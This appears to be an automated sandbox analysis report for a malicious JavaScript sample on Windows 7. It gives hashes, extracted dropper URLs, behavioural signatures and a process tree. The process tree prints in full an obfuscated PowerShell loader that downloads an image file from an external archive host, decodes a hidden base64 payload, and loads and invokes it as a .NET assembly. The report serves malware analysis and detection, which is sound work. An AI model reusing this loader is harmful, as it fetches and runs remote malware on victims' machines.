Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-01-2025 13:57
Static task
static1
Behavioral task
behavioral1
Sample
20250120.js
Resource
win7-20241010-en
windows7-x64
6 signatures
150 seconds
General
-
Target
20250120.js
-
Size
73KB
-
MD5
3c59d737f35d68bbe2e3b439f5b2721e
-
SHA1
348a45200e40b92d6568dfbd84645da895d071e2
-
SHA256
7a9213f8719cf4d04d44e17846fd121c58a3f6d4bf1ffe834836c8ae746b248b
-
SHA512
0b73c8d15fda1e90e7a892c33716e0393ca51a24d404a1ba2146988d2dcab7b9889fd331ca8a1644d6e299d80f3dfb29079ebfc6bce7ac409105d4e7473f84c5
-
SSDEEP
1536:0Q4izQ6VsYW/t5JKtxG+B5jIWiHKHmdcAEGM6vax:0OzQ6Vi/vdPk
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20
exe.dropper
https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1564 powershell.exe 6 1564 powershell.exe -
pid Process 1564 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1564 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1196 wrote to memory of 1564 1196 wscript.exe 30 PID 1196 wrote to memory of 1564 1196 wscript.exe 30 PID 1196 wrote to memory of 1564 1196 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\20250120.js1⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.ennada/az.oc.secnailppanednil//:sp##h';$restoredText = $originalText -replace '#', 't';$vilifiers = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$hemichannels = New-Object System.Net.WebClient;$osteogenesy = $hemichannels.DownloadData($vilifiers);$rescindable = [System.Text.Encoding]::UTF8.GetString($osteogenesy);$phytotoxic = '<<BASE64_START>>';$Homberg = '<<BASE64_END>>';$committed = $rescindable.IndexOf($phytotoxic);$rhamphodon = $rescindable.IndexOf($Homberg);$committed -ge 0 -and $rhamphodon -gt $committed;$committed += $phytotoxic.Length;$dyotheletian = $rhamphodon - $committed;$gradualistic = $rescindable.Substring($committed, $dyotheletian);$quadropole = -join ($gradualistic.ToCharArray() | ForEach-Object { $_ })[-1..-($gradualistic.Length)];$phosphorical = [System.Convert]::FromBase64String($quadropole);$aegophony = [System.Reflection.Assembly]::Load($phosphorical);$stolonization = [dnlib.IO.Home].GetMethod('VAI');$stolonization.Invoke($null, @($restoredText, 'palatines', 'palatines', 'palatines', 'MSBuild', 'palatines', 'palatines','palatines','palatines','palatines','palatines','palatines','1','palatines','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-